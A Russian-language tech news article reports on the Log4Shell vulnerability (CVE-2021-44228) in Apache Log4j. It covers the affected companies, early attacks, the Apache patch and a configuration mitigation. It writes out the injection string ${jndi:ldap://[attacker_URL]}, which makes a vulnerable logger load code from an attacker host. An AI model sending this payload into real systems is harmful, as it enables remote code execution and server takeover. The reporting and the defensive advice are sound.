Новая 0day-уязвимость затрагивает миллионы приложений, крупнейшие компании
Критическую уязвимость нулевого дня, получившую название Log4Shell, недавно обнаружили ИБ-специалисты Alibaba Cloud. При успешной эксплуатации злоумышленники могут запускать на целевом устройстве произвольный код, например внедрять вирусы-вымогатели и криптомайнеры, и получать контроль над атакуемыми серверами. Первые реальные атаки с её использованием Cisco и Cloudflare зафиксировали две недели назад 1 и 2 декабря.
Уязвимости присвоен код CVE-2021-44228 и максимальный уровень опасности по шкале CVSS. Она кроется в библиотеке Apache Log4j, которую используют для ведения логов миллионы Java-приложений.
Для атаки достаточно заставить приложение внести в журнал лишь одну строку кода в формате ${jndi:ldap://[attacker_URL]}, что позволит в дальнейшем интегрировать в него собственный код. В открытый доступ уже выложены рабочие эксплойты, а злоумышленники активно сканируют сеть в поисках уязвимых подключённых устройств. Эксперты по кибербезопасности ожидают, что в ближайшие дни атаки на подверженные системы участятся.
Уязвимость затрагивает Amazon, Apple, Steam, Minecraft, Tesla, Red Hat и множество других компаний, в софте которых используется библиотека. К примеру, в случае Minecraft взломать серверы и компьютеры геймеров можно, отправив сообщение с кодом в окно чата.
Особую серьёзность уязвимости придаёт то, насколько она проста в эксплуатации (атаку может осуществить даже неопытный хакер), насколько обширный контроль может обеспечить злоумышленнику и насколько вездесуща сама библиотека, поэтому потенциальный ущерб огромен.
Apache Foundation в прошлую пятницу выпустила патч и советует разработчикам обновить библиотеку до версии 2.15.0. Если сделать это нет возможности, рекомендуется перевести параметр log4j2.formatMsgNoLookups в значение true.
10 классных ИТ-курсов из сферы, которой не грозят увольнения (июнь 2023)
Собрали для вас интересные курсы по информационной безопасности на различных популярных платформах. В подборке как программы для новичков, так профессиональные сертификации для опытных айтишников, которым требуется прокачать Cyber Security более глубоко или освежить знания.
Релоцировались? Теперь вы можете комментировать без верификации аккаунта.